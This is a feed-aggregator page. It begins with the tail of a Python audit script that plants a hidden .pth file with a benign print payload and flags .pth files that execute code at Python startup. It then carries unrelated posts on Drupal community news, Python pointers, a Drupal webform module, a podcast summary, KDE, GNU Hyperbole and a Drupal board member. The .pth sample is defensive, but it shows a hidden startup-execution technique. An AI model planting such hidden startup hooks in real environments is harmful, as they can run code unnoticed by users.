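    # The hidden file and payload line shown in the article.
    (site_dir / ".your-hidden.pth").write_text(
        'import os; print("This will run on Python startup!")\n', encoding="utf-8")
    # Not a .pth file, so the audit skips it.
    (site_dir / "README.txt").write_text("not a path configuration file\n",
                                         encoding="utf-8")
    return site_dir


def report(site_dir):
    """Print the findings for one directory and return them."""
    findings = audit_site_dir(site_dir)
    for f in findings:
        print(f"{f['verdict']:<10} hidden={f['hidden']!s:<5} {f['file']}")
        for line in f["exec_lines"]:
            print(f"           exec: {line}")
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for directory in sys.argv[1:]:   # e.g. venv/lib/python3.12/site-packages
            report(directory)
    else:
        with tempfile.TemporaryDirectory() as tmp:
            report(build_sample_site_dir(tmp))
```

The security fix described above only makes the interpreter skip hidden .pth files; visible ones containing import lines are still executed at startup, which is why the audit marks them for review.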


Categories: FLOSS Project Planets

The Drop Times: Fostering Diversity, Equity, and Inclusion in Drupal Community

Planet Drupal - Mon, 2024-03-11 09:04

As we weave through the ups and downs of the evolutionary tides of technology, it's imperative to anchor ourselves in the values that foster an inclusive, equitable, and diverse environment. The essence of the Drupal community lies not just in our exceptional technical prowess but in the collective spirit that champions Diversity, Equity, and Inclusion (DEI). This isn't merely a buzzword; it's the bedrock of innovation, creativity, and growth. 

As Mahatma Gandhi once said,

"Our ability to reach unity in diversity will be the beauty and the test of our civilization." 

Let us embrace this wisdom as we continue to build not just extraordinary products but also a community that reflects the world's vast and vibrant tapestry.

In this journey towards a more inclusive community, we must recognize that DEI is not the responsibility of a select few but a commitment from all of us. Whether you are a developer, stakeholder, or a member of the wider public, your voice matters. Your experiences, perspectives, and contributions shape our community's very fabric. Let's pledge to listen, learn, and act with empathy and understanding. Together, we can create a space that not only drives technological advancement but also mirrors the diverse world we live in.

Last week, celebrating Women's Day, TDT spotlighted notable quotes from women in the Drupal community, sharing their valuable insights and messages with fellow Drupalers. Additionally, the TDT released a special feature authored by Alka Elizabeth titled "Inspiring Inclusion: Celebrating the Women in Drupal | #1", emphasizing the importance of fostering inclusivity. In the article, Fei Lauren notes that,

One major problem is that we talk about DEI too abstractly instead of looking at data to identify problems – often, the data isn't even there. And when data is available, too often we talk about solutions without asking the individuals themselves what they need. We should learn to think about everything we do through the lens of DEI, but if we really want to drive change, we need to learn how to ask the right questions.

If any women in the Drupal community have inspired you, please let us know and help us spread the word about them. Please share your insights with us at editor@thedroptimes.com. Also, part two will be out soon, so stay tuned.

Now, let's shift the focus and explore some of the latest news stories and articles we covered last week.

I had the opportunity to interact with James Shield and delve into his extensive 15-year journey within the Drupal community through a unique blend of personal interests and professional advancements. Read the full interview here.

Before the commencement of NERD Summit 2024 on March 8th and 9th, I also had the opportunity to discuss the event with its organizer, Rick Hood, and the keynote speaker, Jessica Cobb. Drawing from their valuable insights, I crafted a featured article highlighting NERD Summit 2024 titled "Exploring the Dynamic Landscape of NERD Summit 2024."

Alka Elizabeth penned a feature on Alex Moreno's initiative to transform Drupal.org by integrating user roles for personalized onboarding, fostering community collaboration, sustainability, and innovation to boost contributions and engagement while also exploring future strategies for a sustainable Drupal and the community's pivotal role in effecting change. Learn more here.

In an exciting collaboration announcement, The Drop Times has partnered with DrupalCamp Ghent 2024, marking their return to Ghent on May 10-11, 2024, as the event's official media partner. We are also the official Media Partner for DrupalCamp Asheville 2024, an important fixture in the Drupal community calendar scheduled from July 12-14.

Developers are invited to submit their Drupal-based projects for consideration in the 2024 Splash Award Germany & Austria, with submissions open until July 31. The awards ceremony, scheduled for November 7 in Berlin, will see experts selecting the winners from the pool of digital projects. For more information, visit this link.

Registration is now available for Drupal Developer Days 2024 in Burgas. Speakers must register on the event's website to submit session proposals, but attendance is open to all without registration.

DrupalCon Portland introduces an exclusive $50 rate for students and recent alumni (from 2022 onwards), extending this discounted offer to individuals from colleges, universities, trade schools, and Drupal training programs. Learn more here.

Drupaljam 2024 announces an early-bird ticket promotion, allowing attendees to secure their spots at the event and save on registration fees until March 31st. More details are available for interested participants here.

Time is running out to submit session proposals for DrupalCon Barcelona 2024, with less than a month left for interested participants to seize the opportunity and share their ideas. Learn more about this here.

Get ready to celebrate coffee and community as the Drupal Coffee Exchange occurs during MidCamp 2024 on Thursday, March 21st, from 2:00 pm to 2:15 pm CDT. Events for the week are here.

Gábor Hojtsy reveals the latest updates on the Drupal 11 release, announcing potential release dates for either the week of July 29 or the week of December 9, 2024, pending completion of beta requirements. To learn more about the release, visit this link.

A critical security update for the Registration Role Module in Drupal has been issued, addressing an access bypass vulnerability affecting versions before 2.0.1. Discovered by Pamela Barone and Renaud Joubert, the flaw stems from a logic error during module upgrades, potentially allowing unauthorized role assignments to new users. Know more about this security update here.

The formation of the Advisory Committee for DrupalCon Barcelona 2024 has been announced, showcasing the combined efforts of diverse volunteers dedicated to ensuring the success of this European Drupal event. For further details about the committee members, visit the provided link.

Alex Moreno unveils a transformative approach to user onboarding, emphasizing enhanced engagement through simplified communication and community contribution incentives. Learn more here.

We acknowledge that there are more stories to share. However, due to selection constraints, we must pause further exploration for now.

To get timely updates, follow us on LinkedIn, Twitter and Facebook. Also, join us on Drupal Slack at #thedroptimes.


Thank you,
Sincerely
Elma John
Sub-editor, TheDropTimes.

Categories: FLOSS Project Planets

Ned Batchelder: Does Python have pointers?

Planet Python - Mon, 2024-03-11 07:27

People sometimes ask, “Does Python have pointers?” I hate to be the typical senior engineer, but this is one of those questions where the answer is, it depends what you mean by pointer.

The classic definition of a pointer is: a variable that holds the address of something else and that you can use to work with that something else. In very broad pseudo-code, it would be something like this:

myvar = SOMETHING;
mypointer = get_address_of(myvar);
print(get_value_via_pointer(mypointer));
## output is SOMETHING

This is useful because we can use a pointer to refer to data, setting the pointer in one part of the code with whatever logic we need to decide what data it should point to. Then elsewhere we can use the pointer without having to know what it’s referring to or how the decision was made. The pointer gives us an indirection that lets us separate concerns and write more modular code.

Many programming languages provide a pointer facility like this. For example, in C, the get_address_of() operation is ampersand, and the get_value_via_pointer() operation is star, and our code snippet would be:

int myvar = 17;
int *mypointer = &myvar;
print_int(*mypointer);      // outputs 17

Other languages like C++, C#, Go, Rust, Pascal, and even Fortran have similar capabilities.

OK, so what about Python? In one sense, Python doesn’t have a pointer concept like this. You could say that get_address_of() is provided by Python’s id() function, since (in CPython at least) it returns the memory address of the data:

myvar = 17
mypointer = id(myvar)   # ** not useful

But Python has no inverse operation: there’s no get_value_via_pointer() that can get you myvar given mypointer.

So Python doesn’t have the classic pair of operations to be able to work with pointers explicitly. But on the other hand, every variable in Python is a pointer, because variables in Python are names that refer to objects.

In Python, our simple example looks like this:

myvar = 17
mypointer = myvar
print(mypointer)    # outputs 17

When someone asks, does Python have pointers, perhaps the best answer is: it doesn’t have explicit pointers like some other languages, but everything is implicitly a pointer. So you have the power of pointers to use when you need them: you can have multiple data structures, then assign a variable to one you choose, and use the variable later. You’ve achieved the separation of “which data” from “work with the data” that pointers provide.

Maybe this is yet another case of Same words, different meanings.

Note:

  • Some languages like C also allow pointer arithmetic to adjust a pointer from one item in an array to another. Python’s references don’t allow for that.
  • Python’s standard library provides ctypes, which is great for interfacing with native C code, exposing details there including C pointers. This does not count as Python having explicit pointers.
Categories: FLOSS Project Planets

ComputerMinds.co.uk: Webform Protected Downloads

Planet Drupal - Mon, 2024-03-11 06:58

I recently produced the first release of the Webform Protected Downloads module that is compatible with Drupal 10. It provides the ability for sites to have 'gated' content which users can download once they have filled out a form for their details. This can convert engaged visitors into leads, set up licenses for customers, or simply validate a user for access to a file. Put simply, as the project's description says, this module could be useful to you if:

  • You want to offer some files for download to either anonymous or registered users
  • You don't want those files to be publicly accessible
  • You want to collect some data before granting access to the files
  • You want to be sure that the user gives a valid email address

One of our clients recently came to us with requirements along these lines for their Drupal 10 site, so I went out looking for suitable solutions. There are several similar modules, but this was the only one that fit these specific needs:

  1. There should be no way for the public to access the files without completing the webform.
  2. There could be more than one file to provide access to from a webform.
  3. The file(s) should be downloaded from the website rather than sent by email.

We had used the module on an old Drupal 7 site a long time ago, but there hadn't been any work on it for a few years and there was no release compatible with Drupal 10. However, development had started in a branch that had been automatically opened up to new maintainers. This was a great example of how that process can help the community keep modules up-to-date and secure with little fuss. All I had to do was confirm a few details myself, and within a few hours I had access to update the project. Of course, I'm building upon the great work that has been done by the previous maintainers - and in this case, Timotej Lovrecic especially, who had created an initial fork on GitHub that was compatible with Drupal 8.

Now that we have a version to use with Drupal 10, let me introduce you to how to use it! I'll assume you can already download and install the module.

Screenshot of the handler settings

When you configure the settings of a webform, you can set up 'handlers'. Emails sent to users or administrators are probably the most common sort of handler, so the tab to configure these under Webform's 'Settings' page is labelled 'Emails / Handlers'. Add a handler, and choose the 'Webform protected download' type in the popup.

From here you can control what amount of verification you want to apply to the download link (such as whether you want to restrict it to the user that submits the form or not), whether the link should only work once, or expire after some time. The file to protect can be uploaded at the bottom of the form. 

Once you've configured and saved your handler, the next step is to use tokens to set how a user receives their link. These could go in an email - in which case configure an email handler, or a confirmation message/page - which can be set from the 'Confirmation' tab of the Webform's 'Settings' page.

In either case, the token to use takes the format: [webform_submission:protected_download_url:my_handler_id]. (If you only have one protected download, you can skip that last part off so it is just [webform_submission:protected_download_url].) The handler ID should be the 'machine name' from your handler settings, which is also shown in a column in the list of handlers. The token will be replaced with the user's unique download URL, so you may wish to use it directly within a plain-text email, or as a link destination in a confirmation message (which is usually HTML).

Example of using a download token for a link within the confirmation message

With that token in the right place, when your guest completes the webform, they'll now receive the link to download the file they wanted - and you'll have what you wanted in return.

Let me know how you get on. Your feedback is welcome in the comments below or in the Webform Protected Downloads module's issue queue!

Categories: FLOSS Project Planets

The Drop Times: Dries Buytaert's Visit to Japan: Fostering Growth for Drupal Community

Planet Drupal - Mon, 2024-03-11 05:59
Explore the burgeoning impact of Dries Buytaert's visit to Japan, which fosters growth and collaboration within the local Drupal community. Delve into the anticipation surrounding his return and the promising prospects it brings for Drupal enthusiasts in Japan.
Categories: FLOSS Project Planets

Python Bytes: #374 Climbing the Python Web Mountain

Planet Python - Mon, 2024-03-11 04:00
Topics covered in this episode:

  • 6 ways to improve the architecture of your Python project (using import-linter): https://www.piglei.com/articles/en-6-ways-to-improve-the-arch-of-you-py-project/
  • Mountaineer: https://github.com/piercefreeman/mountaineer
  • Why Python's Integer Division Floors: https://python-history.blogspot.com/2010/08/why-pythons-integer-division-floors.html
  • Hatchet: https://hatchet.run
  • Extras
  • Joke

Watch on YouTube: https://www.youtube.com/watch?v=SaV3sJ8FlZU

About the show

Sponsored by ScoutAPM: pythonbytes.fm/scout (https://pythonbytes.fm/scout)

Connect with the hosts

  • Michael: @mkennedy@fosstodon.org (https://fosstodon.org/@mkennedy)
  • Brian: @brianokken@fosstodon.org (https://fosstodon.org/@brianokken)
  • Show: @pythonbytes@fosstodon.org (https://fosstodon.org/@pythonbytes)

Join us on YouTube at pythonbytes.fm/live (https://pythonbytes.fm/stream/live) to be part of the audience. Usually Tuesdays at 11am PT. Older video versions available there too.

Brian #1: 6 ways to improve the architecture of your Python project (using import-linter)

  • Piglei
  • Using import-linter (https://github.com/seddonym/import-linter) to
      • define architectural layers
      • check to make sure imports don't violate (import from upper layers)
      • can also check for more contracts, such as
          • forbidden - disallow a specific from/to import
          • independence - list of modules that shouldn't import from each other
  • Fixing violations
      • a process introduced to set exceptions for each violation in a config file
      • then fix violations 1 at a time (nice approach)
      • use the whole team if you can
  • Common methods for fixing dependency issues
      • Merging and splitting modules
      • Dependency Injection, including using protocols to keep type hints without the need to import just for types
      • Use simpler dependency types
      • Delaying function implementations
          • module global methods set by caller, or adding a simple plugin/callback system
      • Configuration driven
          • Setting import statements in a config file and using import_string() at runtime
      • Replace function calls with event-driven approaches

Michael #2: Mountaineer

  • Mountaineer is a batteries-included web framework for Python and React.
  • Mountaineer focuses on developer productivity above all else, with production speed a close second.
      • 📝 Typehints up and down the stack: frontend, backend, and database
      • 🎙️ Trivially easy client<->server communication, data binding, and function calling
      • 🌎 Optimized server rendering for better accessibility and SEO
      • 🏹 Static analysis of web pages for strong validation: link validity, data access, etc.
      • 🤩 Skip the API or Node.js server just to serve frontend clients

Brian #3: Why Python's Integer Division Floors

  • Guido van Rossum
  • Integer division always floors (toward negative infinity) instead of truncating. (C truncates)
  • 5//2 → 2
  • -5//2 → -3
  • 5//-2 → -3
  • Reason,
      • For nice mathematical relationships with // and % (modulo).
      • a//b = quotient (q), a%b = remainder (r)
      • such that b*q + r = a, and 0 <= r < b
          • This works for both positive and negative a values
          • For negative b, the second rule has to change to 0 >= r > b
  • If you truncate (like C does), you have to use abs(r) for the first rule to work.
  • Theory of why C doesn't do it this way: Probably a hardware limitation at the time when C was designed, due to "sign + magnitude" integers instead of modern two's complement integers.

Michael #4: Hatchet

  • Hatchet is a distributed, fault-tolerant task queue which replaces traditional message brokers and pub/sub systems.
  • It's built to solve problems like concurrency, fairness, and durability
  • Concurrency, Fairness, and Rate limiting: Enable FIFO, LIFO, Round Robin, and Priority Queues with built-in strategies to avoid common pitfalls.
  • Architected for Resiliency: Customizable retry policies and built-in error handling to recover from transient failures.

Extras

Brian:

  • Charlie Marsh on uv in PythonTest episode 216: https://pythontest.com/216

Michael:

  • Build An Audio AI App Course [free!]: https://training.talkpython.fm/courses/build-an-audio-ai-app-with-python-and-assemblyai
  • Rock Solid Python with Python Typing Course: https://training.talkpython.fm/courses/python-type-hint-course-with-hands-on-examples
  • Coolio: https://mstdn.social/@RayScript/111919177551660638

Joke: Breaking Prod (https://workchronicles.com/not-if-but-when/)
Categories: FLOSS Project Planets

Activity-aware Firefox 0.4.2 & packages for Debian and Arch

Planet KDE - Sun, 2024-03-10 19:00

If you have not been following this blog series, I made a wrapper for Firefox to be able to run different tabs (and more) in different KDE Plasma Activities.

Often a hurdle to using a piece of software is that it is not packaged for Linux distros.

Kudos to Aurélien Couderc (coucouf), who already packaged 0.4.1 for Debian and provided the patch to make it easier to package for different distros.

With version 0.4.2 of Activity-aware Firefox we applied that patch. Other than that, the functionality remains the same as in 0.4.1.

Then I also wrote an AUR package, so Arch, EndeavourOS etc. should be covered now too.

As a consequence, Repology now lists 12 distro packages for Activity-aware Firefox – that is a great start!

But while large, Debian- and Arch-based distros are just a subset of all available FOSS operating systems that KDE Plasma and Firefox run on. If someone were to put it on Open Build Service to cover also RPM-based and other distros, that would be a great boon!

Contributions welcome, as I am reaching the limit of my skills here.

hook out → server migration successful – more on that some other day

Categories: FLOSS Project Planets

hyperbole @ Savannah: GNU Hyperbole Major Release 9 (V9.0.1) Rhapsody

GNU Planet! - Sun, 2024-03-10 18:22
Overview


GNU Hyperbole 9.0.1, the Rhapsody release, is now available on GNU ELPA. 
And oh what a release it is: extensive new features, new video
demos, org and org roam integration, Markdown and Org file support in
HyRolo, recursive directory and wildcard file scanning in HyRolo, and
much more.

What's new in this release is extensively described here:

  www.gnu.org/s/hyperbole/HY-NEWS.html

  Everything back until release 8.0.0 is new since the last major release
  announcement (almost a year and a half ago), so updates are extensive.

Hyperbole is like Markdown for hypertext.  Hyperbole automatically
recognizes dozens of common patterns in any buffer regardless of mode
and transparently turns them into hyperbuttons you can instantly
activate with a single key.  Email addresses, URLs, grep -n outputs,
programming backtraces, sequences of Emacs keys, programming
identifiers, Texinfo and Info cross-references, Org links, Markdown
links and on and on.  All you do is load Hyperbole and then your text
comes to life with no extra effort or complex formatting.

But Hyperbole is also a personal information manager with built-in
capabilities of contact management/hierarchical record lookup,
legal-numbered outlines with hyperlinkable views and a unique window
and frame manager.  It is even Org-compatible so you can use all of
Org's capabilities together with Hyperbole.

Hyperbole stays out of your way but is always a key press away when
you need it.  Like Emacs, Org, Counsel and Helm, Hyperbole has many
different uses, all based around the theme of reducing cognitive load
and improving your everyday information management.  It reduces
cognitive load by using a single Action Key, {M-RET}, across many
different contexts to perform the best default action in each.

Hyperbole has always been one of the best documented Emacs packages.
With Version 9 comes excellent test coverage: over 400 automated tests
are run with every update against every major version of Emacs since
version 27, to ensure quality.  We hope you'll give it a try.

Videos


If you prefer video introductions, visit the videos linked to below;
otherwise, skip to the next section.

GNU Hyperbole Videos with Web Links


Installing and Using Hyperbole


To install within GNU Emacs, use:

   {M-x package-install RET hyperbole RET}

   Hyperbole installs in less than a minute and can be uninstalled even
   faster if ever need be.  Give it a try.

Then to invoke its minibuffer menu, use:

   {C-h h} or {M-x hyperbole RET}

The best way to get a feel for many of its capabilities is to invoke the
all new, interactive FAST-DEMO and explore sections of interest:

   {C-h h d d}

To permanently activate Hyperbole in your Emacs initialization file, add
the line:

   (hyperbole-mode 1)

Hyperbole is a minor mode that may be disabled at any time with:

   {C-u 0 hyperbole-mode RET}

The Hyperbole home page with screenshots is here:

   www.gnu.org/s/hyperbole

For use cases, see:

   www.gnu.org/s/hyperbole/HY-WHY.html

For what users think about Hyperbole, see:

   www.gnu.org/s/hyperbole/hyperbole.html#user-quotes

Enjoy,

The Hyperbole Team

Categories: FLOSS Project Planets

Drupal Association blog: Meet Imre, empowering Drupal's growth as a board member of the Drupal Association

Planet Drupal - Sun, 2024-03-10 09:30

We're delighted to introduce Imre Gmelig Meijling, one of the newest members elected in October of the Drupal Association Board. Imre, CEO at React Online Digital Agency in The Netherlands, brings a wealth of digital experience from roles at organizations like the United Nations World Food Programme, Disney, and Port of Rotterdam.

Imre is not only a member of the Drupal Association Board of Directors but also serves as an executive member on the DrupalCon Europe Advisory Committee. Previously, he chaired the Dutch Drupal Association, expanding marketing efforts and establishing a successful Drupal Partner Program. Imre played a key role in launching drupal.nl, a community website used by several countries. He co-created the Splash Awards and led Drupaljam, a Dutch Drupal event with almost 500 attendees. In 2023, Imre joined the Drupal Business Survey.

As a recent board member, Imre shares insights on this exciting journey:

What are you most excited about when it comes to joining the Drupal Association board?
I am very excited about joining the Drupal Association Board and contributing with insights and perspectives from the digital business market in Europe. Drupal has a strong market position with many opportunities for the coming years. I look forward to supporting the marketing team in their expanding efforts. I am particularly proud and excited to be part of an inclusive global community. Being part of an inclusive global community and supporting the Open Web Manifesto aligns closely with my personal values.

What do you hope to accomplish during your time on the board?
I aim to help expand Drupal's marketing outreach aiming for more wonderful brands and organizations adopting Drupal and attracting new talent to get involved with Drupal. I am also looking forward to establishing and sustaining relationships between Europe and other regions with the Drupal Association and finding ways to work even more closely together.

What specific skill or perspective do you contribute to the board?
Being part of an inclusive global community and supporting the Open Web Manifesto aligns closely with my personal values. Working with Drupal at various digital agencies in Europe, I support the growth of Drupal from a business perspective, but having a technical background, I know the strength the Drupal community has and can be for brands. Having been in both worlds for a long time, I will help and make sure we bring them together.

I was Chair of the Board for the Dutch Drupal Association, in which time a successful Dutch Partner Program was launched. Also, marketing and advertising on mainstream media was taking off during that time. I was also involved in the design and setup of the Dutch Drupal website, which is now open source. I co-founded the Splash Awards and I am Executive Member of the DrupalCon Europe Community Advisory Committee. I will share all of my experiences where I can. 

How has Drupal impacted your life or career?
It's been part of my life, both professional and personal, for over 16 years.

Tell us something that the Drupal community might not know about you.
I own my own digital agency in The Netherlands, React Online. I began my career as a UX designer and front end developer for Lotus Notes applications, called 'groupware' at the time, a long gone predecessor to the social collaboration platforms that we now know well. Interestingly, my birthday is on January 15, just like Drupal!

Share a favorite quote or piece of advice that has inspired you.
A true leader is not one with the most followers, but one who makes the most leaders out of others. A true master is not the one with the most students, but one who makes masters out of others.

We can't wait to experience the incredible contributions Imre will make during his time on the Drupal Association Board. Thank you, Imre, for dedicating yourself to serving the Drupal community through your board work! Connect with Imre on LinkedIn.

The Drupal Association Board of Directors comprises 12 members, with nine nominated for staggered 3-year terms, two elected by the Drupal Association members, and one reserved for the Drupal Project Founder, Dries Buytaert. The Board meets twice in person and four times virtually annually, overseeing policy establishment, executive director management, budget approval, financial reports, and participation in fundraising efforts.

Categories: FLOSS Project Planets
